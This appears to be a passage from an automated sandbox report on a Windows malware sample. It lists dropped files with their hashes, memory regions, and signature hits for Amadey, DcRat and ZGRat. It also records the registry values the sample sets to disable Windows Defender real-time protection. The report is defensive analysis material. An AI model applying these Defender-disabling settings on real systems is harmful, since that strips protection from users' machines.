memory/1344-122-0x0000000073FE0000-0x00000000746CE000-memory.dmp

memory/1868-123-0x0000000001300000-0x0000000001340000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\9247.exe

MD5 ab873524526f037ab21e3cb17b874f01
SHA1 0589229498b68ee0f329751ae130bd50261a19bd
SHA256 1c821461df42754405a1661ced3406fd519ae8b211fef952fcb6e03d718039cc
SHA512 608bbc1212a345f9e9c66b5d21624127d62d34da617380fce3ea8bfc6b703acfeb675fdd45e9765625f84ff20c3560d122076630a005e561598ae2783adc2c11

C:\Users\Admin\AppData\Local\Temp\9247.exe

MD5 ab873524526f037ab21e3cb17b874f01
SHA1 0589229498b68ee0f329751ae130bd50261a19bd
SHA256 1c821461df42754405a1661ced3406fd519ae8b211fef952fcb6e03d718039cc
SHA512 608bbc1212a345f9e9c66b5d21624127d62d34da617380fce3ea8bfc6b703acfeb675fdd45e9765625f84ff20c3560d122076630a005e561598ae2783adc2c11

memory/2024-129-0x0000000073FE0000-0x00000000746CE000-memory.dmp

memory/2024-130-0x00000000000B0000-0x0000000001330000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\9766.exe

MD5 395e28e36c665acf5f85f7c4c6363296
SHA1 cd96607e18326979de9de8d6f5bab2d4b176f9fb
SHA256 46af9af74a5525e6315bf690c664a1ad46452fef15b7f3aecb6216ad448befaa
SHA512 3d22e98b356986af498ea2937aa388aeb1ac6edfeca784aae7f6628a029287c3daebcc6ab5f8e0ef7f9d546397c8fd406a8cdaf0b46dcc4f8716a69d6fb873de

C:\Users\Admin\AppData\Local\Temp\9766.exe

MD5 395e28e36c665acf5f85f7c4c6363296
SHA1 cd96607e18326979de9de8d6f5bab2d4b176f9fb
SHA256 46af9af74a5525e6315bf690c664a1ad46452fef15b7f3aecb6216ad448befaa
SHA512 3d22e98b356986af498ea2937aa388aeb1ac6edfeca784aae7f6628a029287c3daebcc6ab5f8e0ef7f9d546397c8fd406a8cdaf0b46dcc4f8716a69d6fb873de

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 2aa70916a47ad55b25b51b15e07ded8e
SHA1 4eac7c1c0af31e01535a895041741f1e250aa034
SHA256 f121d244be2845271e734c8eb9c60f2d49df063fecc19a3ee4f89bbc53c47c1d
SHA512 b1d99bedcc4b6b292d628d326f61ed085488aa9dcac003bb520e72ad0a662e6a7b834a59aa522038760a53a9983b949097836737e147084d88ae991d5d454954

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 2aa70916a47ad55b25b51b15e07ded8e
SHA1 4eac7c1c0af31e01535a895041741f1e250aa034
SHA256 f121d244be2845271e734c8eb9c60f2d49df063fecc19a3ee4f89bbc53c47c1d
SHA512 b1d99bedcc4b6b292d628d326f61ed085488aa9dcac003bb520e72ad0a662e6a7b834a59aa522038760a53a9983b949097836737e147084d88ae991d5d454954

\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 2aa70916a47ad55b25b51b15e07ded8e
SHA1 4eac7c1c0af31e01535a895041741f1e250aa034
SHA256 f121d244be2845271e734c8eb9c60f2d49df063fecc19a3ee4f89bbc53c47c1d
SHA512 b1d99bedcc4b6b292d628d326f61ed085488aa9dcac003bb520e72ad0a662e6a7b834a59aa522038760a53a9983b949097836737e147084d88ae991d5d454954

\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 2aa70916a47ad55b25b51b15e07ded8e
SHA1 4eac7c1c0af31e01535a895041741f1e250aa034
SHA256 f121d244be2845271e734c8eb9c60f2d49df063fecc19a3ee4f89bbc53c47c1d
SHA512 b1d99bedcc4b6b292d628d326f61ed085488aa9dcac003bb520e72ad0a662e6a7b834a59aa522038760a53a9983b949097836737e147084d88ae991d5d454954

\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 1c01927ac6e677d4f277cb9f7648ca70
SHA1 30d980c95b28c4856baef117e228d75e6a25e113
SHA256 c2efd2f57310cfa062ce5bc7bd1e87ef55c50412cf9e48d9765e0c2db08bf60a
SHA512 71989e394718c53042e4bc1242f2281610eea390eade147f248dae0a6b79954013654e8cd824e2f367d414758833aabe36f1581ad9d52e9ee63e905ce4d7473e

\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 1c01927ac6e677d4f277cb9f7648ca70
SHA1 30d980c95b28c4856baef117e228d75e6a25e113
SHA256 c2efd2f57310cfa062ce5bc7bd1e87ef55c50412cf9e48d9765e0c2db08bf60a
SHA512 71989e394718c53042e4bc1242f2281610eea390eade147f248dae0a6b79954013654e8cd824e2f367d414758833aabe36f1581ad9d52e9ee63e905ce4d7473e

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 1c01927ac6e677d4f277cb9f7648ca70
SHA1 30d980c95b28c4856baef117e228d75e6a25e113
SHA256 c2efd2f57310cfa062ce5bc7bd1e87ef55c50412cf9e48d9765e0c2db08bf60a
SHA512 71989e394718c53042e4bc1242f2281610eea390eade147f248dae0a6b79954013654e8cd824e2f367d414758833aabe36f1581ad9d52e9ee63e905ce4d7473e

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 1c01927ac6e677d4f277cb9f7648ca70
SHA1 30d980c95b28c4856baef117e228d75e6a25e113
SHA256 c2efd2f57310cfa062ce5bc7bd1e87ef55c50412cf9e48d9765e0c2db08bf60a
SHA512 71989e394718c53042e4bc1242f2281610eea390eade147f248dae0a6b79954013654e8cd824e2f367d414758833aabe36f1581ad9d52e9ee63e905ce4d7473e

\Users\Admin\AppData\Local\Temp\setup.exe

MD5 cac360e5fb18e8f135b7008cb478e15a
SHA1 37e4f9b25237b12ab283fc70bf89242ab3b83875
SHA256 e8689f69dd3d0a3bd5f6e4b3a85251583c4b3b1dbf03e0c30c6cf0048e6532f8
SHA512 7f0bd6103dd802de4a4665b460c8c178f32e6075094532ec43c83fc1d8595d9495772bf191669f4b72cc2d78f91b06e046a11bbd0ef935b040eeb31e741d2a32

C:\Users\Admin\AppData\Local\Temp\A118.exe

MD5 dd007c4e6d34d7270ec93a99f14e2793
SHA1 a168c1b975d3268646f2443444f805e7f5dd0312
SHA256 df696ba95cdd47b74f8393c8a27cf824cb39c0a0613d65708c12cbf988cf0852
SHA512 cd834e05639c3b6ced81071f1aa1bb62955fe667b1106f54d67acc74d4eefd778ff869040ccb14517d13a0c51ce63b1a4222f008b2ff33b48d12bcde66a3b3f6

C:\Users\Admin\AppData\Local\Temp\A118.exe

MD5 dd007c4e6d34d7270ec93a99f14e2793
SHA1 a168c1b975d3268646f2443444f805e7f5dd0312
SHA256 df696ba95cdd47b74f8393c8a27cf824cb39c0a0613d65708c12cbf988cf0852
SHA512 cd834e05639c3b6ced81071f1aa1bb62955fe667b1106f54d67acc74d4eefd778ff869040ccb14517d13a0c51ce63b1a4222f008b2ff33b48d12bcde66a3b3f6

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 2aa70916a47ad55b25b51b15e07ded8e
SHA1 4eac7c1c0af31e01535a895041741f1e250aa034
SHA256 f121d244be2845271e734c8eb9c60f2d49df063fecc19a3ee4f89bbc53c47c1d
SHA512 b1d99bedcc4b6b292d628d326f61ed085488aa9dcac003bb520e72ad0a662e6a7b834a59aa522038760a53a9983b949097836737e147084d88ae991d5d454954

memory/1716-171-0x0000000000220000-0x0000000000229000-memory.dmp

memory/280-170-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 2aa70916a47ad55b25b51b15e07ded8e
SHA1 4eac7c1c0af31e01535a895041741f1e250aa034
SHA256 f121d244be2845271e734c8eb9c60f2d49df063fecc19a3ee4f89bbc53c47c1d
SHA512 b1d99bedcc4b6b292d628d326f61ed085488aa9dcac003bb520e72ad0a662e6a7b834a59aa522038760a53a9983b949097836737e147084d88ae991d5d454954

memory/1716-166-0x0000000000910000-0x0000000000A10000-memory.dmp

memory/280-173-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 2aa70916a47ad55b25b51b15e07ded8e
SHA1 4eac7c1c0af31e01535a895041741f1e250aa034
SHA256 f121d244be2845271e734c8eb9c60f2d49df063fecc19a3ee4f89bbc53c47c1d
SHA512 b1d99bedcc4b6b292d628d326f61ed085488aa9dcac003bb520e72ad0a662e6a7b834a59aa522038760a53a9983b949097836737e147084d88ae991d5d454954

memory/2260-175-0x00000000004D0000-0x000000000052A000-memory.dmp

memory/2260-174-0x0000000000400000-0x000000000047E000-memory.dmp

memory/280-178-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\A118.exe

MD5 dd007c4e6d34d7270ec93a99f14e2793
SHA1 a168c1b975d3268646f2443444f805e7f5dd0312
SHA256 df696ba95cdd47b74f8393c8a27cf824cb39c0a0613d65708c12cbf988cf0852
SHA512 cd834e05639c3b6ced81071f1aa1bb62955fe667b1106f54d67acc74d4eefd778ff869040ccb14517d13a0c51ce63b1a4222f008b2ff33b48d12bcde66a3b3f6

memory/2260-182-0x0000000073FE0000-0x00000000746CE000-memory.dmp

memory/2260-183-0x0000000007070000-0x00000000070B0000-memory.dmp

memory/612-184-0x0000000002740000-0x0000000002B38000-memory.dmp

memory/2024-185-0x0000000073FE0000-0x00000000746CE000-memory.dmp

memory/612-186-0x0000000002740000-0x0000000002B38000-memory.dmp

memory/612-187-0x0000000002B40000-0x000000000342B000-memory.dmp

\Users\Admin\AppData\Local\Temp\setup.exe

MD5 cac360e5fb18e8f135b7008cb478e15a
SHA1 37e4f9b25237b12ab283fc70bf89242ab3b83875
SHA256 e8689f69dd3d0a3bd5f6e4b3a85251583c4b3b1dbf03e0c30c6cf0048e6532f8
SHA512 7f0bd6103dd802de4a4665b460c8c178f32e6075094532ec43c83fc1d8595d9495772bf191669f4b72cc2d78f91b06e046a11bbd0ef935b040eeb31e741d2a32

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 cac360e5fb18e8f135b7008cb478e15a
SHA1 37e4f9b25237b12ab283fc70bf89242ab3b83875
SHA256 e8689f69dd3d0a3bd5f6e4b3a85251583c4b3b1dbf03e0c30c6cf0048e6532f8
SHA512 7f0bd6103dd802de4a4665b460c8c178f32e6075094532ec43c83fc1d8595d9495772bf191669f4b72cc2d78f91b06e046a11bbd0ef935b040eeb31e741d2a32

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 cac360e5fb18e8f135b7008cb478e15a
SHA1 37e4f9b25237b12ab283fc70bf89242ab3b83875
SHA256 e8689f69dd3d0a3bd5f6e4b3a85251583c4b3b1dbf03e0c30c6cf0048e6532f8
SHA512 7f0bd6103dd802de4a4665b460c8c178f32e6075094532ec43c83fc1d8595d9495772bf191669f4b72cc2d78f91b06e046a11bbd0ef935b040eeb31e741d2a32

\Users\Admin\AppData\Local\Temp\setup.exe

MD5 cac360e5fb18e8f135b7008cb478e15a
SHA1 37e4f9b25237b12ab283fc70bf89242ab3b83875
SHA256 e8689f69dd3d0a3bd5f6e4b3a85251583c4b3b1dbf03e0c30c6cf0048e6532f8
SHA512 7f0bd6103dd802de4a4665b460c8c178f32e6075094532ec43c83fc1d8595d9495772bf191669f4b72cc2d78f91b06e046a11bbd0ef935b040eeb31e741d2a32

\Users\Admin\AppData\Local\Temp\setup.exe

MD5 cac360e5fb18e8f135b7008cb478e15a
SHA1 37e4f9b25237b12ab283fc70bf89242ab3b83875
SHA256 e8689f69dd3d0a3bd5f6e4b3a85251583c4b3b1dbf03e0c30c6cf0048e6532f8
SHA512 7f0bd6103dd802de4a4665b460c8c178f32e6075094532ec43c83fc1d8595d9495772bf191669f4b72cc2d78f91b06e046a11bbd0ef935b040eeb31e741d2a32

memory/612-194-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/1816-202-0x0000000000EF0000-0x000000000106E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\kos2.exe

MD5 665db9794d6e6e7052e7c469f48de771
SHA1 ed9a3f9262f675a03a9f1f70856e3532b095c89f
SHA256 c1b31186d170a2a5755f15682860b3cdc60eac7f97a2db9462dee7ca6fcbc196
SHA512 69585560e8ac4a2472621dd4da4bf0e636688fc5d710521b0177461f773fcf2a4c7ddb86bc812ecb316985729013212ccfa4992cd1c98f166a4a510e17fcae74

C:\Users\Admin\AppData\Local\Temp\kos2.exe

MD5 665db9794d6e6e7052e7c469f48de771
SHA1 ed9a3f9262f675a03a9f1f70856e3532b095c89f
SHA256 c1b31186d170a2a5755f15682860b3cdc60eac7f97a2db9462dee7ca6fcbc196
SHA512 69585560e8ac4a2472621dd4da4bf0e636688fc5d710521b0177461f773fcf2a4c7ddb86bc812ecb316985729013212ccfa4992cd1c98f166a4a510e17fcae74

\Users\Admin\AppData\Local\Temp\kos2.exe

MD5 665db9794d6e6e7052e7c469f48de771
SHA1 ed9a3f9262f675a03a9f1f70856e3532b095c89f
SHA256 c1b31186d170a2a5755f15682860b3cdc60eac7f97a2db9462dee7ca6fcbc196
SHA512 69585560e8ac4a2472621dd4da4bf0e636688fc5d710521b0177461f773fcf2a4c7ddb86bc812ecb316985729013212ccfa4992cd1c98f166a4a510e17fcae74

memory/1816-205-0x0000000073FE0000-0x00000000746CE000-memory.dmp

memory/280-212-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1224-211-0x0000000003A80000-0x0000000003A96000-memory.dmp

\Users\Admin\AppData\Local\Temp\set16.exe

MD5 b224196c88f09b615527b2df0e860e49
SHA1 f9ae161836a34264458d8c0b2a083c98093f1dec
SHA256 2a11969fcc1df03533ad694a68d56f0e3a67ce359663c3cf228040ab5baa5ed8
SHA512 d74376c5bd3ba19b8454a17f2f38ab64ad1005b6372c7e162230c822c38f6f8c7d87aef47ef04cb6dceedc731046c30efa6720098cc39b15addd17c809b8296d

memory/2968-222-0x0000000000400000-0x0000000000413000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\set16.exe

MD5 b224196c88f09b615527b2df0e860e49
SHA1 f9ae161836a34264458d8c0b2a083c98093f1dec
SHA256 2a11969fcc1df03533ad694a68d56f0e3a67ce359663c3cf228040ab5baa5ed8
SHA512 d74376c5bd3ba19b8454a17f2f38ab64ad1005b6372c7e162230c822c38f6f8c7d87aef47ef04cb6dceedc731046c30efa6720098cc39b15addd17c809b8296d

C:\Users\Admin\AppData\Local\Temp\7zSB1B3.tmp\Install.exe

MD5 6a77181784bc9e5a81ed1479bcee7483
SHA1 f7bc21872e7016a4945017c5ab9b922b44a22ece
SHA256 38bab577cf37ed54d75c3c16cfa5c0c76391b3c27e9e9c86ee547f156679f2a7
SHA512 e6c888730aa28a8889fe0c96be0c19aad4a5136e8d5a3845ca8a835eb85d5dba1b644c6c18913d56d516ce02a81cd875c03b85b0e1e41ef8fd32fd710665332f

memory/1816-230-0x0000000073FE0000-0x00000000746CE000-memory.dmp

memory/2024-232-0x0000000073FE0000-0x00000000746CE000-memory.dmp

memory/612-235-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/2260-243-0x0000000000400000-0x000000000047E000-memory.dmp

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA1 5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
SHA512 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

memory/2260-276-0x0000000073FE0000-0x00000000746CE000-memory.dmp

memory/1812-281-0x0000000001F70000-0x000000000265F000-memory.dmp

memory/2164-282-0x0000000001030000-0x000000000171F000-memory.dmp

memory/2164-283-0x0000000001030000-0x000000000171F000-memory.dmp

memory/2872-285-0x0000000003040000-0x0000000003267000-memory.dmp

memory/2164-284-0x0000000001030000-0x000000000171F000-memory.dmp

memory/1880-287-0x0000000000F80000-0x00000000011A7000-memory.dmp

memory/1880-288-0x0000000000F80000-0x00000000011A7000-memory.dmp

memory/1880-286-0x0000000000400000-0x0000000000627000-memory.dmp

memory/2164-289-0x0000000000050000-0x000000000073F000-memory.dmp

memory/2812-290-0x0000000000230000-0x0000000000238000-memory.dmp

memory/2164-291-0x0000000010000000-0x000000001057B000-memory.dmp

memory/1880-298-0x0000000000400000-0x0000000000627000-memory.dmp

memory/2812-300-0x000007FEF5AA0000-0x000007FEF648C000-memory.dmp

memory/1880-302-0x0000000000400000-0x0000000000627000-memory.dmp

memory/2832-304-0x000000013FAD0000-0x0000000140071000-memory.dmp

memory/2872-305-0x0000000000400000-0x00000000004CF000-memory.dmp

memory/2872-306-0x0000000003140000-0x0000000003367000-memory.dmp

memory/2968-303-0x0000000000400000-0x0000000000413000-memory.dmp

memory/612-301-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/936-308-0x0000000000DF0000-0x0000000001017000-memory.dmp

memory/936-307-0x0000000000400000-0x0000000000627000-memory.dmp

memory/2260-310-0x0000000007070000-0x00000000070B0000-memory.dmp

memory/936-309-0x0000000000DF0000-0x0000000001017000-memory.dmp

memory/2812-311-0x000000001B2D0000-0x000000001B350000-memory.dmp

memory/612-313-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/612-316-0x0000000002B40000-0x000000000342B000-memory.dmp

memory/2260-319-0x0000000073FE0000-0x00000000746CE000-memory.dmp

memory/612-321-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/2164-322-0x0000000001030000-0x000000000171F000-memory.dmp

memory/1812-324-0x0000000001F70000-0x000000000265F000-memory.dmp

memory/2164-325-0x0000000001030000-0x000000000171F000-memory.dmp

memory/2164-328-0x0000000001030000-0x000000000171F000-memory.dmp

memory/612-329-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/2872-330-0x0000000003040000-0x0000000003267000-memory.dmp

memory/2812-332-0x000007FEF5AA0000-0x000007FEF648C000-memory.dmp

memory/2872-334-0x0000000003140000-0x0000000003367000-memory.dmp

memory/2164-333-0x0000000000050000-0x000000000073F000-memory.dmp

memory/936-336-0x0000000000DF0000-0x0000000001017000-memory.dmp

memory/936-337-0x0000000000400000-0x0000000000627000-memory.dmp

memory/936-335-0x0000000000DF0000-0x0000000001017000-memory.dmp

memory/2812-342-0x000000001B2D0000-0x000000001B350000-memory.dmp

memory/2552-343-0x000000001B160000-0x000000001B442000-memory.dmp

memory/2552-344-0x00000000022D0000-0x00000000022D8000-memory.dmp

memory/1500-349-0x000000013F170000-0x000000013FC80000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\95NZS2IS58ZE3V7619O2.temp

MD5 93383ab2102880bd82fdc44253d81332
SHA1 ed195d1d0e32350864763588648d38346e83c9f9
SHA256 ea3f3843f948791f326e5e92d57c9e7491935e9cb3d17555a588e7367827f9b9
SHA512 ffdad45fa7046b3c345f8c99efed6a5bece629d1b67fbe555fab778922351d773d1be5c48bc503815c4461e7ae192328818b9102fb164090259630ac9e864901

C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\PbWqCNl.exe

MD5 cd3191644eeaab1d1cf9b4bea245f78c
SHA1 75f04b22e62b1366a4c5b2887242b63de1d83c9c
SHA256 f626f7361d341ca2b7c67c2b20ca5ab516a6ce4104048c5a3ee3f2d83cc3039f
SHA512 79ebd59d2f66bf3f4417760ff1c9021b3d0e3dcb65da390bf377c3316ce675add82b79bd90750e9b98f68bd5a5625c2b863fadbd0bf447c372b14a619e43d57a

memory/2832-375-0x000000013FAD0000-0x0000000140071000-memory.dmp

memory/612-383-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/612-386-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/1500-387-0x000000013F170000-0x000000013FC80000-memory.dmp

memory/936-389-0x0000000000400000-0x0000000000627000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

memory/2344-394-0x0000000002890000-0x0000000002C88000-memory.dmp

memory/1500-414-0x000000013F170000-0x000000013FC80000-memory.dmp

memory/2344-415-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/2316-418-0x0000000000400000-0x000000000041B000-memory.dmp

memory/2316-419-0x0000000000400000-0x000000000041B000-memory.dmp

memory/2316-422-0x0000000000400000-0x000000000041B000-memory.dmp

memory/2316-421-0x0000000000400000-0x000000000041B000-memory.dmp

memory/2316-423-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2316-425-0x0000000000400000-0x000000000041B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

C:\Users\Admin\AppData\Local\Temp\TarCF1.tmp

MD5 9441737383d21192400eca82fda910ec
SHA1 725e0d606a4fc9ba44aa8ffde65bed15e65367e4
SHA256 bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5
SHA512 7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

C:\Users\Admin\AppData\Local\Temp\CabCBF.tmp

MD5 f3441b8572aae8801c04f3060b550443
SHA1 4ef0a35436125d6821831ef36c28ffaf196cda15
SHA256 6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf
SHA512 5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d201ce38a7e56523acd51a17b194a10d
SHA1 2ef23d9f4949ff794ea4dfa3bbb1328b88773689
SHA256 d7e7a79d07269fa939e8230d9ce72f768692fc33a8419f0321171dc65048cf99
SHA512 7f87ace4f9f21cbd9190048887ab66ada87aabcb6d0ba74905512e242078337da2a5dc483dc64afe05500ab13b254c4e2f70ae2eae651fbd32278e24afe48e87

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 fd2727132edd0b59fa33733daa11d9ef
SHA1 63e36198d90c4c2b9b09dd6786b82aba5f03d29a
SHA256 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e
SHA512 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

C:\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 5da3a881ef991e8010deed799f1a5aaf
SHA1 fea1acea7ed96d7c9788783781e90a2ea48c1a53
SHA256 f18fdb9e03546bfb98397bcb8378b505eaf4ac061749229a7ee92a1c3cf156e4
SHA512 24fbcb5353a3d51ee01f1de1bbb965f9e40e0d00e52c42713d446f12edceeb8d08b086a8687a6188decaa8f256899e24a06c424d8d73adaad910149a9c45ef09

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

MD5 6bdd19548129778665beb650007dba31
SHA1 c5d729e26bca3885754ef65046472d0bbdc1e684
SHA256 42c8039199f1927e887ad9a83ba7bbbf4131dbc1f753655af7f0159f2ad176b7
SHA512 eef5dc81e65125e23d583a53aa7d838eae7400fd4a4f084f3a2ea3e1fde343f5c7bb2592027b2801bc9e5c005d62f55889bd0b7afaa4a4564dc488e8c2631893

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\04e2bwzs.default-release\prefs.js

MD5 fd1e474cf2bad3bf206df38abb4d5ddc
SHA1 11a79b329555a5f68e56ff352bba06deef6c7582
SHA256 8f8b7ea91c033ec6d36e0964dd6bcad2cc301867915ee243bb79d8d855256c21
SHA512 a7b49c2e05211306863ed7da672ab8ebd75c6231a9c40d1a92f4e6daf939bf222a6e19efcd38b7af940e7a85c8cb68c39ba20f9aa5cb7fa5abbb169378579b13

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 2db99722253fb01b54f1d53beba70f6a
SHA1 c3b94eae9559e35928b73a9880616b7834d5ed68
SHA256 71d2e91922b661a917cfc9a6b414bb091c5bd9c3f35e4e0aeb795246e26a6d8b
SHA512 914bfb5aae61fa540873e0ee7999d32afad0125af7f2bf60a13312b76ad77dc57777ceb9bd05e1f0028fa621229d98ef2404c0dd8e24d70292663efda4575282

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

MD5 f801950a962ddba14caaa44bf084b55c
SHA1 7cadc9076121297428442785536ba0df2d4ae996
SHA256 c3946ec89e15b24b743c46f9acacb58cff47da63f3ce2799d71ed90496b8891f
SHA512 4183bc76bdc84fb779e2e573d9a63d7de47096b63b945f9e335bee95ae28eb208f5ee15f6501ac59623b97c5b77f3455ca313512e7d9803e1704ae22a52459c5

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-25 04:51

Reported

2023-10-25 04:59

Platform

win10-20231023-en

Max time kernel

302s

Max time network

309s

Command Line

"C:\Users\Admin\AppData\Local\Temp\3OJ24hE.exe"

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detected google phishing page

phishing google

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\15BA.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\15BA.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\15BA.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\15BA.exe N/A
